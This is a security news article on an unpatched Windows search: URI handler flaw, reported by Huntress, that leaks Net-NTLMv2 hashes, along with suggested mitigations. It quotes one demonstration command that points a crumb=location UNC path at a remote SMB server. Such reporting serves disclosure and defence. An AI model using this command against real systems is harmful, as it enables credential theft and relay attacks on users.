Unpatched Windows search: URI leaks NTLMv2 hashes

Security researchers at Huntress disclosed an unpatched flaw in Windows’ search: URI handler that can make a PC connect to an attacker-controlled SMB server and disclose the user’s Net-NTLMv2 hash. Huntress reported the issue to Microsoft on April 15, 2026; Microsoft declined to provide a patch.

The vulnerability arises from the search: handler accepting a crumb=location parameter that contains a UNC path. When Windows processes a crafted search: URI, it follows the crumb=location value to the supplied UNC path and attempts NTLM authentication to the remote SMB server. Huntress demonstrated the behavior using a command such as start “” “search:query=test&crumb=location:\\10.0.1.100\\share”.

Huntress noted the flaw uses the same NTLM leakage mechanism and has the same prerequisites as a previously patched issue in the Snipping Tool’s ms-screensketch: URI handler, tracked as CVE-2026-33829 and fixed by Microsoft in April 2026. A similar use of a crumb parameter to steal hashes was documented in 2024 under CVE-2023-35636.

Exploitation requires a user to open a crafted link delivered through a web page, email, or another URL source and approve its launch. The attack also depends on the network allowing outbound SMB connections to the attacker-controlled server and on the target environment accepting NTLM authentication without protections such as SMB signing.

When the system attempts authentication to the remote SMB host, it transmits the Net-NTLMv2 hash, which an attacker can capture. Captured hashes can be used in relay attacks to authenticate to other network services as the user and potentially escalate access.

Microsoft responded to the disclosure by stating that “only Important and Critical severity cases meet our bar for servicing.” Huntress assigned a Moderate severity rating to the issue and described it as producing the same Net-NTLMv2 leak as the earlier snipping-tool vulnerability.

In the absence of a vendor patch, Huntress advised defensive measures including blocking outbound SMB traffic on hosts that do not need it (TCP 445 and 139), enabling SMB signing to prevent relay of captured hashes, and disabling NTLM where feasible. Network segmentation and monitoring for unexpected SMB connections can reduce exposure.

The flaw is part of a recurring class of problems where URI handlers accept and forward file or location parameters without sufficient validation. Security teams are reviewing URL handling policies and applying available mitigations while monitoring for related activity.